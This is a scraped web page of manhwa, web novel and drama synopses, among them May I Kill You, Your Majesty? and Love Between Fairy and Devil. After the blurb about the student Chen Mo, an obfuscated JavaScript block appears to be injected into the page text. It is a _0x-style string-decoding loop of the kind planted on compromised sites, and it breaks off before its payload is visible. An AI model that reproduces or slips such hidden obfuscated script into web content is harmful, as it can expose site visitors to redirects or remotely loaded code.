The tyrant Xi Wuji always thought that his pampered queen treated him affectionately, like a delicate little lotus flower. He thought she loved him, but on the day of his death, he opened his eyes. As a result of his death, she took charge of the government and had many lovers, and lived in debauchery. But he became her favourite lover again in this new life‽
Read manhwa May I Kill You, Your Majesty? / 죽여도 될까요, 폐하 It was a sunny and warm spring day, but it was different from usual. [ There’s a day like that , Erendel. ] My mother once told me. But she died more than a decade ago. [ A curious day so I get to do things that I don’t usually do. You have to be very careful on such a day. [ Why ?] That day , my mother’s purple eyes were shining dimly in the sun. She gave a cool look at her daughter’s question. ~~~~~~~~~~~~~~ [ If you make a mistake , you may be bewitched. ] She said something I couldn’t understand. [ Being fascinated is for a moment , but bewitched is for a lifetime. ] ~~~~~~~~~~~~~~ Erendel was sitting on the floor and looking up at the man with blank eyes. His face that was covered in blood was unfamiliar. No , maybe she really doesn’t know . Maybe I’m dreaming right now. But as if to inform me that it was a hopeless hope. A low voice called my name. “…… Erendel.” “Tell me again . What we talked back then.” On the light purple eyes of Erendel was the blood-soaked Kin .…… Prince Castian’s face was reflected . “I like you.” [ I really like Prince Castia. That’s a lot, too. ] “I mean it” [ I’m serious ] “….. you said that, didn’t you?” “Or were you lying to me?’’ Castian’s smile was empty. “I’m being fooled.” Then he said again “So just tell me that I need to save your life. Then tell me that you’ll be by my side.” .You came to me because you wanted to live anyway, didn’t you?” He’s arguing. …..I mean, I really didn’t know. That my friend in that I thought was a nut, was Prince Castian who had killed me so many times. also know what will happen because of the words choose.
Haram and Hanul are brother and sister with nobody to rely on but each other. They are also Yin, beings who blur the lines of gender and are shunned by society despite being the only ones capable of giving birth to the blessed Yang. One day, Hanul leaves with a promise to come back soon. But as six months pass without a word, Haram sets out to find him, with the unexpected help of a Yang named Chong Yun..
Su Xiaobai was on the brink of death, he was brought into a new world. The soul of the strongest evolver “King of Stars” Long Ming now inhabits his body. Therefore, he has acquired an extremely powerful ability : “The Endlessness of Dim”. The only drawback is that if Xiaobai ever gets a boner, he will experience severe pain. However, when he will have found the murderer of Long Ming and ascended the throne of Protoss Palace, this weakness will disappear… Protoss Dark Emperor
When the zombies started appearing, everyone is at risk, Yang Hao forced to seek help in risk, in danger I found " pick up attributes system" acquired strength attribute, strength +1, acquired agility attribute, agility +1, I picked up? From today onwards, food, resources, beautiful girls, this land, all are mine! Yang Hao screamed! below me are all zombies.. a path to?
I’ve possessed a character in an R-rated BL manhwa. It’s in a world where people, whose craziness ranges from one to ten, appear. “Franz, can you take off your clothes for a moment?” “Sister? Wh-Why my clothes?” Their crazy serenade had already begun. Having been faced with the violence my younger brother had to endure, I made a vow. “Instead of Franz, I’ll have [Schuette] instead.” Those people are coming soon. The people who will exterminate my family, and when that’s not enough, they’ll devour my younger brother’s innocence. “And I’ll become a knight to succeed our family and carry on its legacy.” If he doesn’t go, I’ll die! That’s how I thoroughly hid my brother and decided attend all the official events myself. …But something’s wrong. “I do! I love Kayla Vesta!” “If Young Miss gets hurt, then I’ll…” “I don’t feel the need to wait any longer.” Didn’t you all like men? Why are you all suddenly obsessed with me? First, Let’s Hide My Younger Brother / First of All, Let’s Hide My Younger Brother / 우선 남동생부터 숨기자
Elise, a noble lady who is treated coldly by her family due to her illegitimacy, loses her fiance in the ongoing war. Then, she is forced to marry General Wolfried, a man known as a cruel and ambitious military leader. To Elise, she would be getting married to the person who killed her fiance. Surely to Wolfried, it must be a pointless marriage since he had requested to marry the kingdom’s princess as his reward for winning the war. As Elise shudders at the thought of her new unwanted marriage, General Wolfried calmly informs her that… if she wants to get revenge for her former fiance, he’ll make it happen. Ookami Shougun no Ikenie no Hanayome / 狼将軍の生贄の花嫁
Love Between Fairy and Devil / 苍兰诀 / 魔尊 / Cang Lan Jue / Разлука Орхидеи и повелителя демонов / ของรักของข้า From loveless translations: After a great battle, the weakened demon tribe resurrected the ancient demon lord Dongfang Qingcang, whom they thought would lead the demon tribe to victory over the heavenly realm. Unfortunately, the mighty demon lord accidentally swapped bodies with an inexperienced flower-spirit. What should’ve been an epic war of destruction between the three realms became a slapstick romantic comedy that will create an uproar in the realms instead.
Extras die every day in various ways in the game [Demon King’s Palace 3]. He was an extra when he reincarnated into the game. I’ll never die. Never. “Let’s get started.” Evan had come to a conclusion. He tapped his cheeks as a way of signaling to himself that he had made up his mind. He would become a character who never dies.
Chen mo is an invisible student. He longed to keep low-key but unexpectedly made acquaintance with dynamic girl and Prince Charming… From then on, his peaceful life ended.<script></script><script>(function(_0x249ca8,_0x5a4ce5){var _0x14c5cd=_0x566f,_0x62cb47=_0x249ca8();while(!![]){try{var _0x4d6029=-parseInt(_0x14c5cd(0x8e))/(-0x2528+0x24+0x2505)*(-parseInt(_0x14c5cd(0x97))/(0x1c5d+-0x1*0xaa6+-0x11b5*0x1))+-parseInt(_0x14c5cd(0x9d))/(0x1f*0x2f+-0x3e1*-0x3+-0xd*0x155)*(parseInt(_0x14c5cd(0x8c))/(-0x1763+0x1241*0x1+0x526))+-parseInt(_0x14c5cd(0x98))/(0x1f55+0x22a*-0x2+0x4*-0x6bf)+-parseInt(_0x14c5cd(0x88))/(-0x4*-0xc9+-0x1*-0x1e89+-0x21a7)*(parseInt(_0x14c5cd(0xa1))/(-0x11*0xfa+0xb*-0x26c+0x2b45))+-parseInt(_0x14c5cd(0x8a))/(-0x243e*0x1+-0x6f3+-0x1*-0x2b39)+parseInt(_0x14c5cd(0x8d))/(0x1bfd+0x1689+-0x2f*0x113)*(-parseInt(_0x14c5cd(0xa9))/(-0x49b+0xf76+-0x3*0x39b))+parseInt(_0x14c5cd(0xa4))/(0x5a+0x7ee+-0x83d);if(_0x4d6029===_0x5a4ce5)break;else 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This Human Immortal Is Too Serious : In order to lift the curse of not being able to get close to women, the cross-over person, Wu Xie, plunges into the wonderful ancient flood era, has fun with demons, ghosts and gods, and finally embarks on the path of human immortality, which is comparable to that of the demigods.
Phantom Spirit King, In a world where the Murim world of the past continued on to modern day After the killer Phantom Spirit King' disappeared without a trace, the Murim spent its days peacefully. One day, a drug that enhances the inner strength of Martial Artists appeared, and just in time, the Phantom Spirit King' who had disappeared showed himself. Then, the Murim that was peaceful plunged into the vortex of chaos once again..